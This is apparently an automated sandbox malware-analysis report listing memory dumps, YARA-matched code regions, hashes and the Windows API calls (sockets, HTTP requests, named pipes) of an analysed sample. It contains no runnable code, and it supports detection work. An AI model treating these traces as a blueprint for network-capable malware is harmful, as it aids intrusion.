                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                                                                  • Instruction ID: a68336142a694b4ea7778f662b1399bda95fa39f36c900c5556e207a4f108332
                                                                  • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                                                                  • Instruction Fuzzy Hash: 6ED1D572304A4292DF20DBA5D4902EEA766F794798F900116EF4E97718EF36CE46CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                                  • Instruction ID: 84848dc8c9b8eb3aba007217a0bbcd6b803f8d12ccf809fb5b860898a47fbc9a
                                                                  • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                                  • Instruction Fuzzy Hash: 37617B32714B40D6EB249F62E88439E73E1F79CB94F11512AEA4E83B24DF79C995CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                  • Instruction ID: 7bf834dff18ef2d97432191af032f825d37cd7e6b1fb4cc17482811a90c83697
                                                                  • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                  • Instruction Fuzzy Hash: D1510CB6214A508BD754CB0DE4A072AB7E2F3CCBD4F84521AE38B87B68DA3DD555CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                                                                  • Instruction ID: c18a84c296884c2148f3584f8dcdcb74ce16d9512609834e75fb3b08a9be0ab6
                                                                  • Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                                                                  • Instruction Fuzzy Hash: 9EF0FFD7E1DAE26ADB2346640C7D1982F57A4B2A2134DC14F8B8053F93A4060C01D312
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                                                  • Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
                                                                  • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                                                  • Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                                  • Instruction ID: 539d35eff73e93ac76602df4a068df1f8cc5d4c668e64a5cd509f388140b9171
                                                                  • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                                  • Instruction Fuzzy Hash: 44D05EFBE1DBD21BEB6382284C3D2882F66A162A2074C408F878007FA3E44A1801C311
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                                                  • Instruction ID: c624cead7d371148b89316b008a246588d0c5e32bc8caaeb701ddc815d516811
                                                                  • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                                                  • Instruction Fuzzy Hash: B1C04C57A14AD1579B125A15087A5942B57E5D3D3238A82998D5183E47900A5C17E311
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                                                  • Instruction ID: 8009e9f2c8603c0aa392f075b10aaf32735fc7346bb9e3a3e5ffbe436e7b62eb
                                                                  • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                                                  • Instruction Fuzzy Hash: 60C012DBE1DEC15AE72342544C7509F3ED694F2D1030F4046CF4402753A1460C106251
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                                                                  • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                                                                  • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                                                                  • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                                                                  • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                                                                  • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                                                                  • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: acceptioctlsocket$closesockethtonlselect
                                                                  • String ID:
                                                                  • API String ID: 2003300010-0
                                                                  • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                                  • Instruction ID: 3a22ab2671ea9756bc4af0d6e732f6acd978155fc56be1d3b0b411975531676c
                                                                  • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                                  • Instruction Fuzzy Hash: 2D919932710A919BDB60DF21E9507AD33A6F788B98F008229EB4E47F58DF35C665CB10
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                                                                  • String ID: %s%s$*/*
                                                                  • API String ID: 3787158362-856325523
                                                                  • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                                  • Instruction ID: 4feb4164774b2fa1ebca02c0a566f91f923d055f021e5dab81b1decc33edf96a
                                                                  • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                                  • Instruction Fuzzy Hash: DC711236300B859AEB50DF65E8903ED37A2FB88788F504126EA4D13B68DF3EC51AC710
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                                                                  • String ID:
                                                                  • API String ID: 34948862-0
                                                                  • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                                  • Instruction ID: 6e884b6e5ffd85282d21a74658fbec779b271abfe7c071b39529fe0f93f4ef17
                                                                  • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                                  • Instruction Fuzzy Hash: B541AB32704F01D6EB00DB61E8647AD336BE388BA4F908225DE2F47BA4DF79C4668740
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0067FE36
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0067FE42
                                                                  • __crtIsPackagedApp.LIBCMT ref: 0067FE53
                                                                  • AreFileApisANSI.KERNEL32 ref: 0067FE62
                                                                  • MultiByteToWideChar.KERNEL32 ref: 0067FE88
                                                                  • GetLastError.KERNEL32 ref: 0067FE95
                                                                  • _dosmaperr.LIBCMT ref: 0067FE9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1138158220-0
                                                                  • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                                  • Instruction ID: cf4228a557fd0e6063c7d3efb5bddca3d5e4dcbb782ebe834ceeb27299a869a2
                                                                  • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                                  • Instruction Fuzzy Hash: 2121C132300B4192EB50AF76E81472D77E7AB89FA4F148638EE4947BA6EF3CC5118705
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                  • String ID:
                                                                  • API String ID: 4099253644-0
                                                                  • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                                  • Instruction ID: f1ad4a06997b4ec404ae2e7d0c08ef39ca67135b9a45530cf5c6cb660311c64c
                                                                  • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                                  • Instruction Fuzzy Hash: 81316D25301A4085FE44FF51E8607B423A3BB46B90F084629DD5E177A2DF7EC964CB06
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                                  • String ID: d
                                                                  • API String ID: 1257931466-2564639436
                                                                  • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                                  • Instruction ID: e4ac90b84feb32bba891d0a522a0d5fa65501591bdec2923f5d6bc6cc3296ff1
                                                                  • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                                  • Instruction Fuzzy Hash: 90319C32214B81D6DB20CF62F88479A77A6F788B98F005126EE8D47F28DF79C565CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: write_multi_char$write_string$free
                                                                  • String ID:
                                                                  • API String ID: 2630409672-3916222277
                                                                  • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                                                  • Instruction ID: 93fad225b0fb5ed7e81c76d3e0d515d3c62d7566275eba2a4f6cc3feda05745d
                                                                  • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                                                  • Instruction Fuzzy Hash: 1591133374878496EB25CB65E404BAE7B70F7A6794F24100EEF8A57B99DB38C945CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$ErrorLastSleepselectsend
                                                                  • String ID: d
                                                                  • API String ID: 2152284305-2564639436
                                                                  • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                                  • Instruction ID: efd5a79e5ba5b1a49d4fa8f9e830f0533f845b3e87a0d99194b745c716581666
                                                                  • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                                  • Instruction Fuzzy Hash: 9E219032218A8196D7609F21F88838E7366F784784F504225EBAD47F59DF39C5A4CB44
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 3101085627-0
                                                                  • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                                  • Instruction ID: 20c444c17b0549a3d1c7f0f45b5fa1bf5f6f455f3e7158127a932f33e358a413
                                                                  • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                                  • Instruction Fuzzy Hash: A7318E32700A45AAEB10DFB9E49439D3377F784B98F514126EE0E97A29DF39C549C780
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001C624E
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • __doserrno.LIBCMT ref: 001C6245
                                                                    • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                                                                  • __doserrno.LIBCMT ref: 001C62AB
                                                                  • _errno.LIBCMT ref: 001C62B2
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001C6316
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 388111225-0
                                                                  • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                                                                  • Instruction ID: 38d4aac9496663a0b74bc99d89ee2c492c4ed760ec678c284055fd81f10a89bb
                                                                  • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                                                                  • Instruction Fuzzy Hash: B8210632710394D6C7066FB59C92F2D3620BBB2BA0F95922DEE2517793CB78C892C710
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 00686E4E
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • __doserrno.LIBCMT ref: 00686E45
                                                                    • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                                                                  • __doserrno.LIBCMT ref: 00686EAB
                                                                  • _errno.LIBCMT ref: 00686EB2
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00686F16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 388111225-0
                                                                  • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                                  • Instruction ID: 7cfaa5dcb511f5f5a62132100b7c36c6074cf6fcc5c00208eaf73f742b1eeb31
                                                                  • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                                                  • Instruction Fuzzy Hash: AE21F17231035086C757BF76E89132D3657AB82BA0F958329FE212B792CB7CC8428715
                                                                  APIs
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001CF176
                                                                  • _errno.LIBCMT ref: 001CF16B
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1812809483-0
                                                                  • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                                  • Instruction ID: 07de931665cf7b0ae0fbed8da54a5f8435d64601eeafdbe7b98d6462026b7dde
                                                                  • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                                                  • Instruction Fuzzy Hash: 0341447A610395C2DF24AB62C401BAD72A2E775BE4FA8423EEB9443B85D738C943C700
                                                                  APIs
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0068FD76
                                                                  • _errno.LIBCMT ref: 0068FD6B
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1812809483-0
                                                                  • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                                  • Instruction ID: 4d6e19287958bf355a1f7852a4977f97c7be83c3748a9460f70b2f05641afc63
                                                                  • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                                                  • Instruction Fuzzy Hash: 0841477261039186DF20FB2294442FD77A3EB65BE4FA44336EB9447BA6D739C8928700
                                                                  APIs
                                                                    • Part of subcall function 00680264: _mtinitlocknum.LIBCMT ref: 00683DAA
                                                                    • Part of subcall function 00680264: _amsg_exit.LIBCMT ref: 00683DB6
                                                                  • DecodePointer.KERNEL32 ref: 006802D8
                                                                  • DecodePointer.KERNEL32 ref: 006802F6
                                                                  • EncodePointer.KERNEL32 ref: 00680324
                                                                  • DecodePointer.KERNEL32 ref: 00680339
                                                                  • EncodePointer.KERNEL32 ref: 00680344
                                                                  • DecodePointer.KERNEL32 ref: 00680356
                                                                  • DecodePointer.KERNEL32 ref: 00680366
                                                                  • __crtCorExitProcess.LIBCMT ref: 006803EA
                                                                  • ExitProcess.KERNEL32 ref: 006803F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1550138920-0
                                                                  • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                                  • Instruction ID: 9df82419cd52bf638c99b27bdb88a8babd163be2b3f9864eb32f8bca7f94e206
                                                                  • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                                                  • Instruction Fuzzy Hash: D7418031216B5297F690AF11FC5431973A7F788BD4F440629E98E93B24DF39C5A98700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3339321253-0
                                                                  • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                                  • Instruction ID: b1788b8707f78e1acc7366027eacb695295fd0740c809ae3d58e72257b77e0e2
                                                                  • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                                                  • Instruction Fuzzy Hash: 97316922314A91A2EB24DF21E8647AE6367F744BA8F544134EE0E47B98EF3DC659C740
                                                                  APIs
                                                                    • Part of subcall function 00676BE0: htonl.WS2_32 ref: 00676C3D
                                                                    • Part of subcall function 00676BE0: select.WS2_32 ref: 00676CAB
                                                                    • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676CC3
                                                                    • Part of subcall function 00676BE0: accept.WS2_32 ref: 00676CE0
                                                                    • Part of subcall function 00676BE0: ioctlsocket.WS2_32 ref: 00676CF8
                                                                    • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676D9B
                                                                  • GetTickCount.KERNEL32 ref: 00676BAA
                                                                    • Part of subcall function 00676F2C: malloc.LIBCMT ref: 00676F5E
                                                                    • Part of subcall function 00676F2C: htonl.WS2_32 ref: 00676F91
                                                                    • Part of subcall function 00676F2C: recvfrom.WS2_32 ref: 00676FD5
                                                                    • Part of subcall function 00676F2C: WSAGetLastError.WS2_32 ref: 00676FE2
                                                                  • GetTickCount.KERNEL32 ref: 00676BC2
                                                                  • GetTickCount.KERNEL32 ref: 006770E0
                                                                  • GetTickCount.KERNEL32 ref: 006770F6
                                                                  • shutdown.WS2_32 ref: 00677115
                                                                  • shutdown.WS2_32 ref: 0067712A
                                                                  • closesocket.WS2_32 ref: 00677134
                                                                  • free.LIBCMT ref: 00677154
                                                                  • free.LIBCMT ref: 00677169
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                                                  • String ID:
                                                                  • API String ID: 3610715900-0
                                                                  • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                                  • Instruction ID: d8f480d3902b15dbd3bfb10997250aad907e18a79d7c5dc3265a71454a942d6c
                                                                  • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                                                  • Instruction Fuzzy Hash: F2218D72204A42C2DB209F72E85436923A7F748F88F18C225DE4D87725DF75C9A1CB56
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001C7033
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • __doserrno.LIBCMT ref: 001C702B
